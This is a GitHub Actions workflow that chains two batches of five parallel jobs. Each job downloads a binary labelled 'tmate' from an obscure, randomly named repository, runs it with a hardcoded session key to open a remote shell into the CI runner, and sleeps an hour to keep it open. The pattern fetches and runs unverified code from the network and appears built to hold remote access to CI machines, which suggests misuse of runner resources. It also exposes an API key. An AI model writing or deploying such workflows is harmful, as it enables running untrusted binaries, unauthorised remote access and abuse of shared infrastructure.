name: tmate-5x-batch-chain

on:
  workflow_dispatch:

jobs:
  tmate-batch-1:
    runs-on: ubuntu-latest
    timeout-minutes: 61
    strategy:
      matrix:
        session_num: [1, 2, 3, 4, 5]
      fail-fast: false
    steps:
      - name: Download tmate and start session
        run: |
          wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate
          chmod +x tmate
          ./tmate -F -n ${{ matrix.session_num }} -k tmk-mS87E0h6YTY55X6FpuAAbWFMpg &
          sleep 3600

  tmate-batch-2:
    needs: tmate-batch-1
    runs-on: ubuntu-latest
    timeout-minutes: 61
    strategy:
      matrix:
        session_num: [6, 7, 8, 9, 10]
      fail-fast: false
    steps:
      - name: Download tmate and start session
        run: |
          wget https://raw.githubusercontent.com/hp20h5w91nf1/hp20h5w91nf1/main/tmate
          chmod +x tmate
          ./tmate -F -n ${{ matrix.session_num }} -k tmk-mS87E0h6YTY55X6FpuAAbWFMpg &
          sleep 3600
